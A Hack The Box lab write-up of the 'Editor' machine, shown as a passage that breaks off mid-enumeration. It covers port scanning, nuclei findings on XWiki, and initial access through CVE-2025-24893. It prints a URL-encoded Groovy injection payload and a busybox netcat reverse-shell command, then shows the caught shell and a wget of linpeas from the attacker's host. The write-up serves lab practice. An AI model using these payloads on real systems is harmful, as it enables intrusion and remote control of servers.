RETURN_TO_HOME
HTB Editor - Linux (Easy)
Enumerate 2 HTTP on port 80 and 8080 to find one of them are based on XWiki Debian that's vuln to CVE-2024-24893, elevate to User with credential on XML files, then PrivEsc with CVE-2024-32019 NDSudo.
From HTB: -
Starts with enumerating 2 HTTP services on port 80 and 8080 to find one of them are based on XWiki Debian that’s vuln to CVE-2024-24893.
Then elevate internally to User with credential on XML files, then PrivEsc with CVE-2024-32019 NDSudo.
- Network Enumeration
┌──(kali㉿kali)-[~]
└─$ ping -c2 10.10.11.80
PING 10.10.11.80 (10.10.11.80) 56(84) bytes of data.
64 bytes from 10.10.11.80: icmp_seq=1 ttl=63 time=248 ms
64 bytes from 10.10.11.80: icmp_seq=2 ttl=63 time=247 ms
--- 10.10.11.80 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1070ms
rtt min/avg/max/mdev = 246.916/247.362/247.808/0.446 ms
Awesome, continue with NMAP scanning:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.10.11.80 -oA nmap/nmapscan
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at
Nmap scan report for 10.10.11.80
Host is up (0.25s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p22,80,8080 -sC -sV -sCV -n 10.10.11.80 -oA nmap/nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at
Nmap scan report for 10.10.11.80
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open http Jetty 10.0.20
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
| http-webdav-scan:
| WebDAV type: Unknown
| Server Type: Jetty(10.0.20)
|_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds
editor.htb
There’s 2 HTTP here, and we got a domain of editor.htb, but the interesting parts are the port 8080, might look into it than the 80.
- WebApp Enumeration and Discovery
Port 80.
Might deal with this one later, and now let’s see the Other one on 8080:
Straight spawn into that direcotry, and now we have an info of XWiki version of 15.10.8.
Based on Nmap I think the attack surface are pretty open, so for vuln scanning might be faster with thc-Nuclei.
Continue with Automation script for Vuln Hunting and Directory Discovery:
<details> <summary>Click to view bash output</summary>┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://editor.htb:8080/ --filter-status 404
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben “epi” Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://editor.htb:8080/
🚩 In-Scope Url │ editor.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
💢 Status Code Filters │ [404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/commentadd => http://editor.htb:8080/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01c8ecxvlvtp6xs7ysh7hjuw3d19.node0?srid=Qi8IAuv4&xredirect=%2Fxwiki%2Fbin%2Fcommentadd%3Fsrid%3DQi8IAuv4
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/cancel => http://editor.htb:8080/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01t2oj5h2waqigs0fv2s71nv6p20.node0?srid=XgplGEtY&xredirect=%2Fxwiki%2Fbin%2Fcancel%3Fsrid%3DXgplGEtY
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/ => http://editor.htb:8080/xwiki/bin/view/Main/
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/propupdate => http://editor.htb:8080/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node0geo8kdqlhuyj1soenh02gjpb022.node0?srid=RTS5IsKO&xredirect=%2Fxwiki%2Fbin%2Fpropupdate%3Fsrid%3DRTS5IsKO
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/deletespace => http://editor.htb:8080/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node0h7z1bngcmpjd1ctcgfiv4muub23.node0?srid=14aZ2ADh&xredirect=%2Fxwiki%2Fbin%2Fdeletespace%3Fsrid%3D14aZ2ADh
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/propdisable
. . .[SNIP]. . .
Jeez, too much. Continue with Nuclei might be better.
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -target http://editor.htb
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v3.4.5 (outdated)
[INF] Current nuclei-templates version: v10.3.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 119
[INF] Templates loaded for current scan: 8775
[INF] Executing 79 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 8696 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1868 (Reduced 1739 Requests)
[INF] Using Interactsh Server: oast.live
[waf-detect:nginxgeneric] [http] [info] http://editor.htb
[snmpv3-detect] [javascript] [info] editor.htb:161 [”Enterprise: unknown”]
[ssh-auth-methods] [javascript] [info] editor.htb:22 [”[”publickey”,”password”]”]
[ssh-password-auth] [javascript] [info] editor.htb:22
[ssh-server-enumeration] [javascript] [info] editor.htb:22 [”SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13”]
[ssh-sha1-hmac-algo] [javascript] [info] editor.htb:22
[openssh-detect] [tcp] [info] editor.htb:22 [”SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13”]
[http-missing-security-headers:permissions-policy] [http] [info] http://editor.htb
[http-missing-security-headers:x-content-type-options] [http] [info] http://editor.htb
[http-missing-security-headers:referrer-policy] [http] [info] http://editor.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://editor.htb
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://editor.htb
[http-missing-security-headers:strict-transport-security] [http] [info] http://editor.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://editor.htb
[http-missing-security-headers:x-frame-options] [http] [info] http://editor.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://editor.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://editor.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://editor.htb
[nginx-version] [http] [info] http://editor.htb [”nginx/1.18.0”]
[tech-detect:nginx] [http] [info] http://editor.htb
[caa-fingerprint] [dns] [info] editor.htb
[INF] Scan completed in 3m. 21 matches found.
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -target http://editor.htb:8080/
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v3.4.5 (outdated)
[INF] Current nuclei-templates version: v10.3.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 119
[INF] Templates loaded for current scan: 8775
[INF] Executing 79 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 8696 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1868 (Reduced 1739 Requests)
[INF] Using Interactsh Server: oast.site
[CVE-2025-32430] [http] [medium] http://editor.htb:8080/xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
[CVE-2025-29925] [http] [high] http://editor.htb:8080/xwiki/rest/wikis/xwiki/pages?space [path=”xwiki/rest/wikis/xwiki/pages?space=”]
[internal-ip-disclosure] [http] [info] http://editor.htb:8080/ [”10.10.11.80”]
[webdav-enabled] [http] [info] http://editor.htb:8080/
[snmpv3-detect] [javascript] [info] editor.htb:161 [”Enterprise: unknown”]
[ssh-password-auth] [javascript] [info] editor.htb:22
[ssh-sha1-hmac-algo] [javascript] [info] editor.htb:22
[ssh-auth-methods] [javascript] [info] editor.htb:22 [”[”publickey”,”password”]”]
[ssh-server-enumeration] [javascript] [info] editor.htb:22 [”SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13”]
[openssh-detect] [tcp] [info] editor.htb:22 [”SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13”]
[options-method] [http] [info] http://editor.htb:8080/ [”OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK”]
[http-missing-security-headers:strict-transport-security] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:content-security-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:permissions-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:x-content-type-options] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:clear-site-data] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:x-frame-options] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:referrer-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[robots-txt] [http] [info] http://editor.htb:8080/robots.txt
[xwiki-detect] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/ [”WebHome”]
[CVE-2025-32970] [http] [medium] http://editor.htb:8080/xwiki/bin/view/Main/?foo=bar&foo_syntax=invalid&RequiresHTMLConversion=foo&xerror=https://oast.me
[CVE-2023-35162] [http] [medium] http://editor.htb:8080/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)
[CVE-2024-45591] [http] [medium] http://editor.htb:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history
[CVE-2025-24893] [http] [critical] http://editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
[tech-detect:jetty] [http] [info] http://editor.htb:8080/xwiki/
[robots-txt-endpoint:endpoints] [http] [info] http://editor.htb:8080/robots.txt [”/xwiki/bin/admin/”,”/xwiki/bin/jcaptcha/”,”/xwiki/bin/inline/”,”/xwiki/bin/preview/”,”/xwiki/bin/save/”,”/xwiki/bin/rollback/”,”/xwiki/bin/reset/”,”/xwiki/bin/deletespace/”,”/xwiki/bin/register/”,”/xwiki/bin/downloadrev/”,”/xwiki/bin/loginsubmit/”,”/xwiki/bin/logout/”,”/xwiki/bin/import/”,”/xwiki/bin/unknown/”,”/xwiki/bin/webjars/”,”/xwiki/bin/viewrev/”,”/xwiki/bin/objectadd/”,”/xwiki/bin/redirect/”,”/xwiki/bin/edit/”,”/xwiki/bin/propdelete/”,”/xwiki/bin/objectremove/”,”/xwiki/bin/get/”,”/xwiki/bin/distribution/”,”/xwiki/bin/deleteversions/”,”/xwiki/bin/propdisable/”,”/xwiki/bin/dot/”,”/xwiki/bin/delattachment/”,”/xwiki/bin/login/”,”/xwiki/bin/export/”,”/xwiki/bin/viewattachrev/”,”/xwiki/bin/create/”,”/xwiki/bin/undelete/”,”/xwiki/bin/upload/”,”/xwiki/bin/temp/”,”/xwiki/bin/skin/”,”/xwiki/bin/jsx/”,”/xwiki/bin/saveandcontinue/”,”/xwiki/bin/propadd/”,”/xwiki/bin/commentsave/”,”/xwiki/bin/objectsync/”,”/xwiki/bin/attach/”,”/xwiki/bin/ssx/”,”/xwiki/bin/loginerror/”,”/xwiki/bin/lock/”,”/xwiki/bin/pdf/”,”/xwiki/bin/cancel/”,”/xwiki/bin/delete/”,”/xwiki/bin/propupdate/”,”/xwiki/bin/propenable/”,”/xwiki/bin/commentadd/”]
[tech-detect:jetty] [http] [info] http://editor.htb:8080/xwiki
[tech-detect:jetty] [http] [info] http://editor.htb:8080/
[caa-fingerprint] [dns] [info] editor.htb
[INF] Scan completed in 4m. 33 matches found.
Great, we manage to found 5+ CVE’s on this 8080 WebApp, one of them are critical listed under CVE-2025-24893.
Some others CVE’s are also being very valuable in Bug bounty such as XSS and potentials CSRF.
Let’s continue with that CVE critical brings us into. Looks like it can be RCE.
- CVE-2025-24893 for Initial Access
Great, we have a potential no-login needed RCE. Let’s be a script Kiddie and just find a script for this CVE:
Me use this:
Usage:
python3 CVE-2025-24893.py -t 'http://example.com:8080' -c 'busybox nc 10.10.10.10 9001 -e /bin/bash'
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c 'busybox nc 10.10.14.115 9001 -e /bin/bash'
[*] Attacking http://editor.htb:8080/
[*] Injecting the payload:
http://editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.14.115%209001%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[*] Command executed
Our listener:
<details> <summary>Click to view bash output</summary>┌──(kali㉿kali)-[~]
└─$ sudo rlwrap -cAr nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.11.80] 59866
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
which python3
/usr/bin/python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
xwiki@editor:/usr/lib/xwiki-jetty$
zsh: suspended sudo rlwrap -cAr nc -lvnp 9001
┌──(kali㉿kali)-[~]
└─$ stty raw -echo; fg
[1] + continued sudo rlwrap -cAr nc -lvnp 9001
xwiki@editor:/usr/lib/xwiki-jetty$
xwiki@editor:/usr/lib/xwiki-jetty$
xwiki@editor:/usr/lib/xwiki-jetty$
xwiki@editor:/usr/lib/xwiki-jetty$
xwiki@editor:/usr/lib/xwiki-jetty$ id
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
xwiki@editor:/usr/lib/xwiki-jetty$ pwd
pwd
/usr/lib/xwiki-jetty
xwiki@editor:/usr/lib/xwiki-jetty$
And I do upgrade on the TTY for this with python, supposed if you want better experience might use penelope for Shell.
But I like my old style.
<details> <summary>Click to view text output</summary>xwiki@editor:/usr/lib/xwiki-jetty$ export TERM=xterm
export TERM=xterm
xwiki@editor:/usr/lib/xwiki-jetty$ ls -al
ls -al
total 72
drwxr-xr-x 5 root root 4096 Jul 29 11:48 .
drwxr-xr-x 91 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 6 root root 4096 Jul 29 11:48 jetty
lrwxrwxrwx 1 root root 14 Mar 27 2024 logs -> /var/log/xwiki
drwxr-xr-x 2 root root 4096 Jul 29 11:48 start.d
-rw-r--r-- 1 root root 5551 Mar 27 2024 start_xwiki.bat
-rw-r--r-- 1 root root 6223 Mar 27 2024 start_xwiki_debug.bat
-rw-r--r-- 1 root root 10530 Mar 27 2024 start_xwiki_debug.sh
-rw-r--r-- 1 root root 9340 Mar 27 2024 start_xwiki.sh
-rw-r--r-- 1 root root 2486 Mar 27 2024 stop_xwiki.bat
-rw-r--r-- 1 root root 6749 Mar 27 2024 stop_xwiki.sh
drwxr-xr-x 3 root root 4096 Jun 13 17:08 webapps
xwiki@editor:/usr/lib/xwiki-jetty$
Let’s do internal enumeration.
- PrivEsc to User
xwiki@editor:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Jul 8 08:34 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-x--- 4 oliver oliver 4096 Nov 8 00:57 oliver
xwiki@editor:/home$
So local User are only oliver. Supposed now we can search up for the rest of credentials back to the WebApp:
<details> <summary>Click to view text output</summary>xwiki@editor:/var$ ls -al
ls -al
total 52
drwxr-xr-x 13 root root 4096 Jul 29 11:55 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 2 root root 4096 Nov 8 00:00 backups
drwxr-xr-x 15 root root 4096 Jul 29 11:55 cache
drwxrwxrwt 2 root root 4096 Nov 8 06:25 crash
drwxr-xr-x 50 root root 4096 Jul 29 11:55 lib
drwxrwsr-x 2 root staff 4096 Apr 18 2022 local
lrwxrwxrwx 1 root root 9 Feb 17 2023 lock -> /run/lock
drwxrwxr-x 15 root syslog 4096 Nov 8 00:00 log
drwxrwsr-x 2 root mail 4096 Feb 17 2023 mail
drwxr-xr-x 2 root root 4096 Feb 17 2023 opt
lrwxrwxrwx 1 root root 4 Feb 17 2023 run -> /run
drwxr-xr-x 4 root root 4096 Feb 17 2023 spool
drwxrwxrwt 2 root root 4096 Nov 7 20:14 tmp
drwxr-xr-x 3 root root 4096 Jun 15 04:59 www
xwiki@editor:/var$ tree .
tree .
Command ‘tree’ not found, but can be installed with:
apt install tree
Please ask your administrator.
xwiki@editor:/var$
But seeking manually might time:
<details> <summary>Click to view text output</summary>xwiki@editor:/var/backups$ ls -al
ls -al
total 824
drwxr-xr-x 2 root root 4096 Nov 8 00:00 .
drwxr-xr-x 13 root root 4096 Jul 29 11:55 ..
-rw-r--r-- 1 root root 51200 Nov 8 00:00 alternatives.tar.0
-rw-r--r-- 1 root root 37945 Jul 29 11:54 apt.extended_states.0
-rw-r--r-- 1 root root 4194 Jul 29 11:33 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4172 Jul 2 10:15 apt.extended_states.2.gz
-rw-r--r-- 1 root root 4103 Jun 15 04:59 apt.extended_states.3.gz
-rw-r--r-- 1 root root 3550 Jun 13 09:59 apt.extended_states.4.gz
-rw-r--r-- 1 root root 0 Nov 8 00:00 dpkg.arch.0
-rw-r--r-- 1 root root 268 Apr 27 2023 dpkg.diversions.0
-rw-r--r-- 1 root root 100 Feb 17 2023 dpkg.statoverride.0
-rw-r--r-- 1 root root 703493 Jul 29 11:55 dpkg.status.0
xwiki@editor:/var/backups$ cd ..
cd ..
xwiki@editor:/var$ cd www
cd www
xwiki@editor:/var/www$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Jun 15 04:59 .
drwxr-xr-x 13 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 3 root root 4096 Jun 15 06:18 html
xwiki@editor:/var/www$ cd html
cd html
xwiki@editor:/var/www/html$ ls
ls
assets index.html
xwiki@editor:/var/www/html$ cd assets
cd assets
xwiki@editor:/var/www/html/assets$ ls -al
ls -al
total 21984
drwxr-xr-x 2 root root 4096 Jun 17 09:10 .
drwxr-xr-x 3 root root 4096 Jun 15 06:18 ..
-rw-r--r-- 1 root root 16052 Jun 15 06:20 index-DzxC4GL5.css
-rw-r--r-- 1 root root 190349 Jun 17 09:10 index-VRKEJlit.js
-rw-r--r-- 1 root root 11932476 Jun 16 09:42 simplistcode_1.0.deb
-rw-r--r-- 1 root root 10354968 Jun 17 09:08 simplistcode_1.0.exe
xwiki@editor:/var/www/html/assets$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 editor editor.htb wiki.editor.htb
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
xwiki@editor:/var/www/html/assets$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:ing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
xwiki@editor:/var/www/html/assets$ ss -tunlp
ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 127.0.0.1:8125 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8125 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:19999 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:43093 0.0.0.0:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 50 [::ffff:127.0.0.1]:8079 *:* users:((”java”,pid=1047,fd=41))
tcp LISTEN 0 50 *:8080 *:* users:((”java”,pid=1047,fd=43))
xwiki@editor:/var/www/html/assets$
Let’s fire LinPEAS.
<details> <summary>Click to view text output</summary>xwiki@editor:/var/www/html/assets$ cd /tmp
cd /tmp
xwiki@editor:/tmp$ ls -al
ls -al
total 24
drwxrwxrwt 6 root root 4096 Nov 8 11:31 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 2 xwiki xwiki 4096 Nov 7 20:14 hsperfdata_xwiki
drwx------ 2 xwiki xwiki 4096 Nov 7 20:14 jetty-0_0_0_0-8080-root-_-any-183771140518029249
drwx------ 3 xwiki xwiki 4096 Nov 7 20:15 jetty-0_0_0_0-8080-xwiki-_xwiki-any-16614714059127584943
drwx------ 2 xwiki xwiki 4096 Nov 8 00:46 tmux-997
xwiki@editor:/tmp$ wget http://10.10.14.115/linpeas.sh
wget http://10.10.14.115/linpeas.sh
--2025-11-08 12:05:57-- http://10.10.14.115/linpeas.sh
Connecting to 10.10.14.115:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 954437 (932K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 932.07K 613KB/s in 1.5s
2025-11-08 12:05:59 (613 KB/s) - ‘linpeas.sh’ saved [954437/954437]
xwiki@editor:/tmp$ bash linpeas.sh
bash linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
. . .[SNIP]. . .
I’m only inspecting anything that’s important.
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: less probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
